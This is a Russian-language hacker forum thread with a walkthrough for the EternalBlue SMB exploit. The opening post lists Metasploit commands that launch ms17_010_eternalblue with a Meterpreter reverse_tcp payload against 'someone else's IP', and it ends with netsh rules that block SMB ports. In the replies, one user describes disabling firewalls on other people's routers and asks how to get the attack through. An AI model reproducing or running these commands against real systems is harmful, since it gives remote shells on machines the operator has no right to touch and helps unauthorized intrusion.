• Начинающий хакер, спасибо что зашёл к нам! Для полного удобства рекомендуем Вам сразу же зарегистрироваться. Помните, необходимо придумать сложный пароль к своему логину, в котором будут присутствовать цифры, а так же символы. После регистрации вы сможете пользоваться чатом. Так же не забудьте активировать аккаунт через письмо, высланное вам на почту ! Администрация заботится о каждом из Вас...
  • Для просмотра разделов из категории Private Informations & Programms необходимо купить

Exploit EternalBLUE

Статус
В этой теме нельзя размещать новые ответы.

NURLAN

Гость
N

NURLAN

Гость
Всем здравствуйте! Не судите строго,это моя первая тема. Сегодня я буду рассказывать про EternalBLUE Exploit.
Небольшой рассказ:
EternalBLUE это эксплоит который иcпользует уязвимость smb v1.o и аттакует порт 445.
На последних версиях Metasploit Framework данный Exploit со сканером уже имеется.
Для эксплоутации я буду использовать дедик Amazon Kali, P.S. лавку прикрыли и дедики уже бесплатно нельзя создавать. После того как мы скачали Kali Linux 2017 мы пишем команду msfconsole.Посмотреть вложение 1305
Ждем...
Когда загрузится будет так:Посмотреть вложение 1306
Дальше проверяем наличимость данного эскплоита.
Посмотреть вложение 1307
Далее пишем команду: use exploit/windows/smb/ms17_010_eternalblue
Посмотреть вложение 1308
далее пишем:set payload windows/x64/meterpreter/reverse_tcp
set lhost ваш_ip
set rhost чужой_ip
run
И после команды run эксплоит запустится.
P.P.S я сейчас не взламывал комп,ибо мне лень.
P.P.P.S. вирус WannaCry использовал именно данный эксплоит.
Как пофиксить:
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=135 name="Block_TCP-135"
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=137 name="Block_TCP-137"
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=138 name="Block_TCP-138"
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=139 name="Block_TCP-139"
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=445 name="Block_TCP-445"
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=5000 name="Block_TCP-5000"
 

mystery_227

Пользователь
Пользователь

mystery_227

Пользователь
Пользователь
Регистрация
5 Июн 2017
Сообщения
1
Реакции
0
Reputation
0
Баллы
1
Темка норм
 

Aceki

Повелитель клавиатуры
Топовый

Aceki

Повелитель клавиатуры
Топовый
Регистрация
19 Янв 2017
Сообщения
966
Реакции
210
Reputation
0
Баллы
4
Telegram
@Aceki
Можно ли попробывать такое провернуть с роутером на котором запущен SMB???
 

NURLAN

Гость
N

NURLAN

Гость
Aceki, нет,потому-что на роутере используется система Unix,а нужно чтобы была система Windows.
 

Aceki

Повелитель клавиатуры
Топовый

Aceki

Повелитель клавиатуры
Топовый
Регистрация
19 Янв 2017
Сообщения
966
Реакции
210
Reputation
0
Баллы
4
Telegram
@Aceki

GT800

Пользователь
Пользователь

GT800

Пользователь
Пользователь
Регистрация
1 Авг 2017
Сообщения
2
Реакции
0
Reputation
0
Баллы
1
а подскажите пожалуйста, есть доступ к нескольким роутерам, их пользователи используют интернет от билайн. я отключаю фаервол провайдера и фаервол роутера, вписываю правило в nat на 445 порт затем перезагружаю роутер, но блин один фиг порт фильтруется, я не могу провести атаку. Как исправить?
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху Снизу